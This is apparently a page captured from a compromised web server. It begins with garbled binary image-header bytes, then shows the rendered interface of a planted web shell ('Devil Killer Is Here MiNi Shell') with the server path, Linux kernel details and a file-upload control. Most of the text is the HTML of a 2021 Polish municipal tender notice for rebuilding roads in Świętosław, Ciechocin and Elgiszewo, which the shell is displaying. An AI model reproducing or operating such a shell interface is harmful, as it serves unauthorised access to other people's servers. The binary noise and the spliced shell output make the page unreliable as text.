JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211013/0023179401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg gminnych w miejscowości Świętosław, Ciechocin i Elgiszewo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ciechocin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ciechocin 172</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciechocin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-408</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">5668387781</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ciechocin@ciechocin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ciechocin.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg gminnych w miejscowości Świętosław, Ciechocin i Elgiszewo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6687640e-2c1f-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00231794</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ciechocin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ciechocin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy zakupowej dostępnej<br/>pod adresem https://platformazakupowa.pl/pn/ciechocin 2. Składanie dokumentów wpostępowaniu z<br/>wyjątkiem oferty, odbywa się elektronicznie za pośrednictwem formularza ,,WYŚLIJ WIADOMOŚĆ”<br/>dostępnego na stronie dotyczącej danego postępowania.3. Za datę złożenia dokumentów o których<br/>mowa w ust. 2, przyjmuje się kliknięcie przycisku ”WYŚLIJ WIADOMOŚĆ” po którym pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego. 4. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych za pośrednictwem platformy zakupowej o której mowa w<br/>ust. 1, opisane zostały w Regulaminie platformazakupowa.pl oraz Instrukcji dla Wykonawców<br/>platformazakupowa.pl, dostępnych na stronie dotyczącej danego postępowania oraz stronie głównej<br/>Platformy pod adresem https://platformazakupowa.pl5. Występuje limit objętości plikówlub<br/>spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów przy<br/>maksymalnej wielkości 150 MB. 6. Sposób sporządzenia i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. (Dz.U. z 2020 poz. 2452)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>Ogłoszenie nr 2021/BZP 00212204/01 z dnia 2021-10-05 2021-10-05 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:• administratorem Pani/Pana danych osobowych<br/>jest:Wójt Gminy Ciechocin, Ciechocin 172, 87-408 Ciechocin• inspektorem ochrony danych osobowych<br/>w Gminie Ciechocin jest Michał Daczko adres e-mail: odoserwis@gmail.com • Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego na realizację zadania pn. „Przebudowa dróg gminnych w miejscowości Świętosław, Ciechocin i Elgiszewo ” – numer postępowania KIR.271.1.6.2021, prowadzonym w trybie przetargu<br/>nieograniczonego;• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia<br/>29 stycznia 2004 r. – Prawo zamówień publicznych (t.j Dz. U. z 2019 r. poz. 1843 z późn. zm.), dalej<br/>„ustawa Pzp”;• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;• obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp;• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;• posiada Pani/Pan: na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących; na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych1); na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO2); prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;• nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. 1)<br/>Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.2) Wyjaśnienie:<br/>prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Jak wskazano w pkt 3.15.) RODO (obowiązek<br/>informacyjny): pkt 9.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KIR.271.1.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>- Przebudowa drogi gminnej nr 110441C w miejscowości Świętosław. Stan istniejący drogi: na całym odcinku objętym opracowaniem posiada nawierzchnię utwardzona kruszywem wapiennym, gruzem betonowym z pozarastanymi poboczami gruntowymi, zaoranymi przez rolników. Nawierzchnia posiada liczne zadolenia i zagłębienia spowodowane migracją drobnych cząstek pod wpływem wody opadowej oraz istniejącego ruchu pojazdów. Na odcinku objętym opracowaniem pod drogą nie ma zlokalizowanych żadnych przepustów. Zjazdy w ciągu drogi gminnej na pola nie są widoczne i nie posiadają jakiejkolwiek nawierzchni utwardzonej. W pasie drogowym nie ma zlokalizowanych żadnych sieci infrastruktury podziemnej.<br/>- Przebudowa drogi gminnej nr 110431C oraz drogi gminnej na działce 386 w miejscowości Ciechocin. Stan istniejący drogi: Istniejąca droga gminna w miejscowości Ciechocin posiada nawierzchnię utwardzoną kruszywem naturalnym. Odcinek drogi gminnej będący zakresem opracowania zlokalizowany jest w granicach obszaru rozproszonej zabudowy rolnej i mieszkalnej. Droga gminna od początku opracowania skrzyżowanie z drogą powiatową nr 2121 C Ciechocin - Świętosław posiada nawierzchnię w bardzo złym stanie technicznym. Na chwile obecną nawierzchnia drogi gminna nie posiada prawidłowego przekroju poprzecznego z uwagi na wstępujące przegięcia, zaniżenia nawierzchni. Na terenie objętym opracowaniem nie występuje zadrzewienie kolidujące z przebudową. Na terenie objętym inwestycją występuje infrastruktura wodociągowa. <br/>- Przebudowa drogi gminnej w miejscowości Elgiszewo zlokalizowanej na działce o nr ewid. 265. Stan istniejący drogi: droga na całym swym odcinku posiada nawierzchnię gruntową, utwardzona szlaką oraz częściowo kruszywem z pozarastanymi poboczami gruntowymi. Droga posiada widoczne zadolenia oraz ubytki spowodowane migracją cząstek pod wpływem głownie wody opadowej. Na odcinku objętym opracowaniem pod drogą nie ma zlokalizowanych żadnych przepustów. W pasie drogowym zlokalizowana jest sieć teletechniczna, sanitarna oraz sieć wodociągowa. <br/>Zakres robót składających się na przedmiot zamówienia obejmuje w szczególności: <br/>	Roboty przygotowawcze; <br/>	Roboty pomiarowe;<br/>	Roboty ziemne; <br/>	Wykonanie podbudowy; <br/>	Wykonanie nawierzchni; <br/> Oznakowanie dróg i urządzenie bezpieczeństwa ruchu;<br/>	Wykonanie zjazdów.<br/>Przedmiot zamówienia obejmuje również:<br/>	Organizacje placu budowy, <br/>	opracowanie dokumentacji niezbędnej do prawidłowej organizacji i realizacji robót budowlanych, <br/>	zabezpieczenie terenu budowy, <br/>	wykonanie niezbędnych badań i prób, <br/> wykonanie geodezyjnej dokumentacji powykonawczej, <br/>	uporządkowanie terenu po zakończeniu robót. <br/>Szczegółowy opis przedmiotu zamówienia oraz warunki jego realizacji zawiera:<br/>	dokumentacja projektowa obejmująca projekt budowlano-wykonawczy;<br/>	specyfikacja techniczna wykonania i odbioru robót budowlanych, <br/>	stała organizacja ruchu;<br/>	wzór umowy, <br/>	przedmiar robót, <br/>Załączony do SWZ przedmiar ma jedynie charakter informacyjny. Wykonawca po zapoznaniu się z dokumentacja techniczną i innymi dokumentami jest zobowiązany do ustalenia zakresu robót niezbędnych do osiągnięcia rezultatu. <br/>Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej miejsca realizacji przedmiotu zamówienia w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania. <br/>Wykonawca zobowiązany jest wykonać przedmiot umowy z materiałów nowych i nieużywanych, stanowiących jego własność. Zastosowane materiały i urządzenia powinny posiadać wymagane przepisami atesty i certyfikaty, w tym również świadectwa dopuszczenia do obrotu i certyfikaty bezpieczeństwa, oraz powinny odpowiadać wymaganiom norm i przepisów wymienionych w specyfikacji technicznej i dokumentacji projektowej oraz innych nie wymienionych, ale obowiązujących norm i przepisów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">71351810-4 - Usługi topograficzne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Podana w ofercie cena ryczałtowa musi uwzględniać wszystkie<br/>wymagania Zamawiającego określone w niniejszej Specyfikacji. Musi obejmować wszelkie koszty<br/>związane z wykonaniem zadania opisanego w SIWZ, dokumentacji projektowej, szczegółowej<br/>specyfikacji technicznej, z uwzględnieniem robót wynikających z wizji lokalnej, obowiązujących<br/>przepisów oraz sprawowania nadzoru wykonawczego na budowie. W oferowanej cenie ryczałtowej Wykonawca ujmie wszelkie koszty, jakie może ponieść z tytułu należytego oraz zgodnego z umową i<br/>obowiązującymi przepisami wykonania przedmiotu zamówienia, w tym również koszty towarzyszące<br/>wykonaniu, o których mowa w niniejszej Specyfikacji, a także koszty ryzyka Wykonawcy związanego z<br/>wynagrodzeniem ryczałtowym. Cena oferty stanowić będzie ryczałtowe i ostateczne wynagrodzenie<br/>Wykonawcy za wykonanie przedmiotu zamówienia, niezależnie od rozmiaru robót budowlanych i<br/>innych świadczeń oraz ponoszonych przez Wykonawcę kosztów ich realizacji. Wykonawca nie będzie<br/>mógł żądać podwyższenia wynagrodzenia, chociażby w czasie zawarcia umowy nie można było<br/>przewidzieć rozmiaru lub kosztów tych robót i innych świadczeń.Podstawą obliczenia ceny oferty za<br/>roboty budowlane ma być opracowany przez Wykonawcę kosztorys ofertowy sporządzony w oparciu o<br/>przekazaną dokumentację projektową oraz specyfikację techniczną wykonania i odbioru robót z<br/>uwzględnieniem dyspozycji zawartych w niniejszej Specyfikacji.Za ustalenie ilości robót i innych<br/>świadczeń oraz sposób przeprowadzenia na tej podstawie kalkulacji ofertowego wynagrodzenia<br/>ryczałtowego odpowiada wyłącznie Wykonawca.Przyjmuje się, że Wykonawca uwzględnił w cenie<br/>oferty, a tym samym w kosztorysie ofertowym stanowiącym podstawę jej obliczenia, cały zakres robót<br/>ujęty w SIWZ, dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru<br/>robót.Przedmiary robót zamieszczone w SWZ są tylko wytycznymi mogącymi służyć do wyceny prac, z<br/>których Wykonawca może skorzystać przy obliczaniu ceny oferty, ale nie ma takiego obowiązku.<br/>Wykonawca ma prawo przedłożyć uzupełnienia do załączonego w SWZ przedmiaru.Zamawiający nie<br/>wymaga złożenia wraz z ofertą kosztorysu ofertowego. W przypadku złożenia kosztorysu ofertowego<br/>przez Wykonawcę wraz z ofertą, nie będzie on podlegał ocenie na etapie badania i oceny ofert.<br/>Kosztorys ofertowy zobowiązany będzie złożyć Wykonawca, którego oferta zostanie uznana za<br/>najkorzystniejszą, po uprawomocnieniu się decyzji o wyborze jego oferty, a przed zawarciem umowy o<br/>udzielenie zamówienia.Kosztorys ofertowy Specyfikacji może zostać wykorzystany jako pomocniczy do<br/>ustalenia rzeczowego zakresu robót budowlanych, do kalkulacji ewentualnych zamówień jak również<br/>do obliczenia należnego wynagrodzenia Wykonawcy w przypadku odstąpienia od umowy.Skutek<br/>pominięcia okoliczności, które mogą wpłynąć na cenę przedmiotu zamówienia, obciążać będzie<br/>Wykonawcę. Od Wykonawcy wymagane jest bardzo szczegółowe zapoznanie się z przedmiotem<br/>zamówienia, a także sprawdzenie warunków wykonania zamówienia i skalkulowania ceny oferty z<br/>należytą starannością.Zamawiający wymaga, aby kosztorys ofertowy spełniający wszystkie wymogi<br/>Zamawiającego określone w Specyfikacji, sporządzić metodą kalkulacji uproszczonej, polegającej na<br/>obliczeniu wartości netto danej pozycji kosztorysu, jako iloczynu ilości (liczby) ustalonych przez<br/>Wykonawcę na podstawie dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru<br/>robót jednostek przedmiarowych i ceny jednostkowej danej pozycji kosztorysu</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>- Kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to<br/>z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych warunków, których spełnianie Wykonawca<br/>zobowiązany jest wykazać w sposób szczególny.<br/>- Zdolności technicznej lub zawodowej:<br/>Wykonawca musi udowodnić, iż wykonał (zrealizował i zakończył) nie wcześniej niż w okresie<br/>ostatnich pięciu lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 2 roboty budowlane<br/>polegające na budowie/ rozbudowie/ przebudowie/ modernizacji dróg o wartości brutto każdej z<br/>tych robót nie mniejszej niż 300 000,00.<br/>Uwaga:<br/>􀀀 przez wykonanie (zrealizowanie i zakończenie) należy rozumieć doprowadzenie co najmniej<br/>do podpisania protokołu końcowego odbioru robót,<br/>􀀀 przez jedno zadanie należy rozumieć robotę budowlaną (wykonanie albo zaprojektowanie i<br/>wykonanie), zrealizowaną w oparciu o jedną umowę cywilnoprawną,<br/>􀀀 dla potrzeb oceny spełnienia warunku określonego powyżej, jeżeli wartości zostaną podane w<br/>walutach innych niż PLN, Zamawiający przyjmie średni kurs PLN do waluty podany przez NBP<br/>na dzień opublikowania ogłoszenia o zamówieniu.<br/>-Wykonawca spełni warunek, jeżeli wykaże, iż będzie dysponował osobami, które będą<br/>uczestniczyć w wykonywaniu zamówienia tj. minimum 1 osobą do pełnienia funkcji kierownika<br/>budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności inżynieryjnej drogowej.<br/>Uwaga: przez uprawnienia budowlane rozumie się uprawnienia wydane na podstawie<br/>rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019 r. poz. 831) lub 